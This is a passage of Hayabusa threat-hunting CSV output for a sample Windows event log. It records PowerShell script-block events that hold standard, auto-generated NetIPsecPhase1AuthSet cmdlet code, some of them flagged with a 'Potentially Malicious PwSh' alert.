${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' -Alias '*' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject 
(cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' -Alias '*' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
